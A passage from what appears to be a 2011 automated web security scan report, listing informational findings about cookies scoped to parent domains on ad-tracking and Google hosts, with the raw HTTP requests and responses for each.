Date: Tue, 19 Jul 2011 18:50:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=huWud6MKM7fGr0sLtRFuzkknrgsqAUkTp5IgBXkjCJaXl1aBa2/a1BTGEGc6O2eGT1eLV6q4Dy5MBqDybpe/t+hzl8OwCOE533KhHnYrArt9HgSVUjzpYV8BY2XC/2FgpB5CiaviiqCklljw6gCQppgmf301SbQsao3jTu8JT28V5D++bg4X/u7IqczRA+pCv/AEKmcJV9srYhH/qlNZ7tBqNPtTMu1U4xT08moPm4Y4Ch/OYdqCwrk81oJzey2qnZdg6xTi8vobg+YNRJX9aNVT3l/iQfBmQR8nrLQCxIfls1E30U4qkqvqndWd6WsgqCEpREkk+78aS/kgGNXYWlKuHD/1zX7CxFAIQSOcb9AQDJV4rZoYSi8v3O2dsqVYzRKsE8Ai4wLbk8hpZV+dbBtMzaSUTxBSc2yw69wZ2Ipmon6WGQhryD0tKpL7OtTNgqYdcbQ3laI4KTk4JXZ9o38DMubgklNazzhfx8w2ERFgv9vPYx2+BrY5ltemg5F8DAZcU43GXtzMHdW+dsyRXnabk9Lu6RdwhM+HaUARBVzZ9te0DlM9fMQ6i8/OIGSj; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

13.75. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLv3NC8JZjpr3hepMJpsGd7ZVglywUUUvJuj5VZ2CE0t8dfV5LwaUQjNwVbd1KDsr77b16gERAB5waljbHAN6H98Pl0AhsBm+/8/n4kBAKNvbGggCQBQCKFjwO/4vNXlthu+mZudlKzcvg2eD0PWpTrOGzZmDhy+kT1EmcwBoAO0IKtoEgPyuRXsrKhjAPdfOqp1WY2DrEwqBJauu/w5tyh+BT9TzPYbaJrEufdJZOhzK/ze/4INKhyYkuK043aby26fhjo1fRPvQfg8Vv9ky31mCuwE2rn7zHOg9uUTIR9/pT+2Q1cNcL2sBgO2QKXWJUHA0GoPCnCuTu4FXIceSN86XOvYLtaDGb/VE3/cWEa5h+xLU/n1eRAWVNpONAcc8IVRrB3yeJ+KZN3OVRWFiTolD4d3Q8UaXRlyCCjx/p+9x7pkknB2pF7nnL/SmYr2Lwjns5uaNn1lO0BlYt1u9k1UDPZSahS4NFOuD3X7Z5sqpUTrt4mKNQSJi4y9vt051ZS0wALkL1C0RPG1PmP3SYnWNvGCkLyo687UCx7dnLLq3YM2Jf98NxWkSunKBwuza1h43Y+vH2Bpt/cCUySR+dYMe9BO5npHhLxmC5mqL9dUOwlx16FRiJl2J98XY1lkRTF3T4F3eP+K3/BSXRJVMGHbX5U7MkXwp2xFhrmN4IvwhCjXOUYPuMOXAkZdv1pAEzw/DPAosnP9wPXrDue1sA1RI0N90Ohj/cQIHkT9B2IKlnJUzb+ZwBq7LMhDN0uh2H+F2T/IPQM8Kb8cPmV36Ob6LJGyvSJW7JlTQPJbnJrHWuYc/f8oc1hOALQN1Uh3yf7Ttj9AjZg8L2p/XRPHZooO2apNxEVKh9IITo1syr0JzfL9xVF/mdaXIcTytwEWVcX8z+P+GimfPZDdpXVtm6bNTVaRwiAtECRbgIwqHinNlb6kYt5dvK5n3gpnddFIIx6JUu99J8AmRXTwOmFiplx4GT5tbsXq6MRCZ6YoegbYXQtj9uuSZY/aVe8bIoKBgB40J2xpeACsFVdmudeB9yPdJbGhAuE2tc6hB8iQ0tKRVP0DfEAn5r/MnT5QbieDGHG2/yzv1qvm6NtoCZnilGVcciWqVvbwutNO4pGGWhC8E+oCe3Iqgcr4x+AP0bWSXCBf68XSjr3AyN62bAor0Dk1J9FAbXW9n7wvgQGxi6YrNuupRHSk3JnEjRwwFfq6wHwnF94B9We6QFXJY1ME6z6t2mKyVJBEcuuoLF2cnfBLokoHsm9TyeNXvGUQ6wdYC1AjzJVIFdFPsWKKK5OidfKjVBnGRyasdUPinEXieAmNfxMPANj+005urzTjHzAqPGSxIS31eC04uTJ+TSVEF5ww9PPNQHdBDjcbIwwuREREsUZDTmZiikJKGA6HzdIjgDSIrEzNpjwxQJvJ71PMSxdc0m+0PApKF46AMpju8YcoicKsjnMDKIuSbXRYc14=; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=C07583&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpn3tsfwP3C13ELVR0CQCV8tpujhUfWhmS6NTgEmCnCZ++Kg6mfGQNWB4S7E4rk4kRS6EemAcxwlypsWECT4LBvY3ZVyCrts6XqdTZLTTjsU1Ta44fEsrqkF3QR8AOUEazdr73Yx/v5GsElQg2z/OxHimPEHU8H9vtdJVlTWa3RAtda3D/U67y/ubm7yMeD05sVGFPn1GloHXbGc6QArtZrs4LlIZSa0c/3WWqlPgJBCVF4jRqC3hM+vRmU6J2FYvvoyoAQBFW2qGWrCcQIr4DGDGoFFqkTIKf0vEd0h2I6LjYGgX1CvS21MywhPm/F6pyJL6pR60KkkHrWCMq8m9de56wmRRDdiuvI4U2dNhS1sPwTc8AJmULpuJf7j/y0mC8xQDfPOYuNpl9d48zBA1Db6kf5rrOZgz6Nsv6GDaVXGwPrqMpwbxTqEKyRJm4qd1YU0pC/+3cjUmDytTEVvwfzUhTic/Yr8YO74Yh1GljmAeoHUE/nBX5aURGIkYgXrs6Vc2sH3rBMi03t9mq/cL9Nj1G7oPtwlfosCDCW1s45wrzwmX1BVmtF3VeqdswFUzK7GoiF4ncwW7Thw974oEX5k9uHeLK9ubMWgFddOp5E+U1ixsBTiJzizMEic5ZimkGUiiA2SDkdPaPqcNbExXL9CUw8sCLmtGOg4b6dKWsniQFGvSsZr6SD0D6vrTL50s25Z6YG/uMCBW29BBgPISdd4nOKGOBBDGl8qd8YIQyBcJweaFIdSxXwooYodaQ4Y4xqzUi9fxCOPJydOz85nIM8KNhnKtW3HL74kCi591Z9kc08IWXL3x3rtVjY4YjjFdvlZH1bFa10yT8hjf9E2L44N2PoWw5Md/XVaVAlebEvmdjBjZ0hUKsaUOX1JzVhkBQ+KGzcx+sotktzYFcOwoEeKHZPtz5HryZmzu47uVTDhLOkBldHf+vrTGvT1QrAvsxqkQTDyPIQyQGBzDHQvl0TLZlZXMkeHlOYy2ULroOabknOi4aktm3dGtOGl+KB/AS3HyzbdCgi6BKGaN8PGmmeS9UIptYOh+SSzHDfIk1Xhl2hjQbO/ugEdqDYDzxTRBXRudZxYKFkueHvhVFlPQH83WEmQ1QD9yVKDYz8hbSfvcvIc4xblteaZg3Cr1RoeqL01TISneJPTII93k4HyMtQO9vpfkxofTWPDqHGQN0flp+qZ9RDQafFcsZZ/yMHHKtC2FnoFyZMbweX76sJrCybzpidSGnfinvvckpsBmXXqWv/WXgJq0JYZxkXmgSpOUan+W6t2NLXZQk6uBcMTaMyS6ZIRJtPwG1V5ojzmtrOP1xJjVHroOP37vmPnBK7aplXTPZ7APFyxXHub+Sh7ScDaetlyS3joMbfIhHGNBDCxxt7CMI4OkocONePsFdRy4lLyEbAB69B4uZJRgboLOgUIpb9kVC1/fb5RAacwDUEBee7IwtZ8I4i+4+Es2Vz5qkMbQsE04r8/eirLSb86MAm/Kc+2GigTWoHGK5AYrpfgPfB2AYZn7fdaAY0GB9B3W1mmPM0N2m7oUr0GzTCDA8llTSp/W++zggVRL5RNuhm4t23/CGDzIFUjHnwYa6q4lbFRwblEuM6P8Bm997Ei12i+TbSga+YKk6qJI/1rqyenbNJhmvKp+VjvEW4DWQkDwnPTRd0hx4NMbkkWHgjaogiL2OKACU7kfOe05M28O8IhCEnkgatzwM24rVjViBkVbYcIGr2s6sN4nM6JXd6Y42yYDFbOWR+7XVbVuMKJiTwYiIg+9uZ+JgSNIPedCW7IEltpSm3gGVxp1cnmwgOzdoycrFzWMjJhorPz+oofpq7CZiZwecNku6gOEQtxXSbfUjQrno=; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=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; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEVNlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3bTpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; rsi_us_1000000="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"

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLv3NC8JZjpr3hepMJpsGd7ZVglywUUUvJuj5VZ2CE0t8dfV5LwaUQjNwVbd1KDsr77b16gERAB5waljbHAN6H98Pl0AhsBm+/8/n4kBAKNvbGggCQBQCKFjwO/4vNXlthu+mZudlKzcvg2eD0PWpTrOGzZmDhy+kT1EmcwBoAO0IKtoEgPyuRXsrKhjAPdfOqp1WY2DrEwqBJauu/w5tyh+BT9TzPYbaJrEufdJZOhzK/ze/4INKhyYkuK043aby26fhjo1fRPvQfg8Vv9ky31mCuwE2rn7zHOg9uUTIR9/pT+2Q1cNcL2sBgO2QKXWJUHA0GoPCnCuTu4FXIceSN86XOvYLtaDGb/VE3/cWEa5h+xLU/n1eRAWVNpONAcc8IVRrB3yeJ+KZN3OVRWFiTolD4d3Q8UaXRlyCCjx/p+9x7pkknB2pF7nnL/SmYr2Lwjns5uaNn1lO0BlYt1u9k1UDPZSahS4NFOuD3X7Z5sqpUTrt4mKNQSJi4y9vt051ZS0wALkL1C0RPG1PmP3SYnWNvGCkLyo687UCx7dnLLq3YM2Jf98NxWkSunKBwuza1h43Y+vH2Bpt/cCUySR+dYMe9BO5npHhLxmC5mqL9dUOwlx16FRiJl2J98XY1lkRTF3T4F3eP+K3/BSXRJVMGHbX5U7MkXwp2xFhrmN4IvwhCjXOUYPuMOXAkZdv1pAEzw/DPAosnP9wPXrDue1sA1RI0N90Ohj/cQIHkT9B2IKlnJUzb+ZwBq7LMhDN0uh2H+F2T/IPQM8Kb8cPmV36Ob6LJGyvSJW7JlTQPJbnJrHWuYc/f8oc1hOALQN1Uh3yf7Ttj9AjZg8L2p/XRPHZooO2apNxEVKh9IITo1syr0JzfL9xVF/mdaXIcTytwEWVcX8z+P+GimfPZDdpXVtm6bNTVaRwiAtECRbgIwqHinNlb6kYt5dvK5n3gpnddFIIx6JUu99J8AmRXTwOmFiplx4GT5tbsXq6MRCZ6YoegbYXQtj9uuSZY/aVe8bIoKBgB40J2xpeACsFVdmudeB9yPdJbGhAuE2tc6hB8iQ0tKRVP0DfEAn5r/MnT5QbieDGHG2/yzv1qvm6NtoCZnilGVcciWqVvbwutNO4pGGWhC8E+oCe3Iqgcr4x+AP0bWSXCBf68XSjr3AyN62bAor0Dk1J9FAbXW9n7wvgQGxi6YrNuupRHSk3JnEjRwwFfq6wHwnF94B9We6QFXJY1ME6z6t2mKyVJBEcuuoLF2cnfBLokoHsm9TyeNXvGUQ6wdYC1AjzJVIFdFPsWKKK5OidfKjVBnGRyasdUPinEXieAmNfxMPANj+005urzTjHzAqPGSxIS31eC04uTJ+TSVEF5ww9PPNQHdBDjcbIwwuREREsUZDTmZiikJKGA6HzdIjgDSIrEzNpjwxQJvJ71PMSxdc0m+0PApKF46AMpju8YcoicKsjnMDKIuSbXRYc14=; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:25 GMT; Path=/
Last-Modified: Tue, 19 Jul 2011 16:02:25 GMT
Cache-Control: max-age=3600, private
Expires: Tue, 19 Jul 2011 17:02:25 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:25 GMT
Content-Length: 5953

//AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC)
var rsi_now= new Date();
var rsi_csid= 'C07583';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...

13.76. http://m.adnxs.com/msftcookiehandler previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.adnxs.com
Path:	/msftcookiehandler

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:49:01 GMT; domain=.adnxs.com; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /msftcookiehandler?t=1&c=MUID%3d3957719BE8F34A5DA51D204E7E06704A%7cEANON%3dA%253D0120022nZOEvsWG4cdC9mqZ0E3fugcCxJk8E2sEKwCETBPlId0tyuvg4lUa6XfTAIF-9ayVYkENmoj3ol2zmnbUSkZd6X%2526E%253Db48%2526W%253D1%7cNAP%3dV%253D1.9%2526E%253Daee%2526C%253D1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg%2526W%253D1 HTTP/1.1
Host: m.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ib.adnxs.com/acb?member=311&width=160&height=600&pb=340&cb=8014375&referrer=
Cookie: uuid2=7212282717808390200; icu=ChII1LEDEAoYASABKAEwu9mX8QQQu9mX8QQYAA..; anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3Z#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`9N16/A@62N!Q.2s=Ac+OBmJhP_oR<_TyZVw>RTOLn3<LqI4'Re#$=p4'AIQo@#P#Vcnd)nEfl3!*RKTYEy<t; sess=1

Response

13.77. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

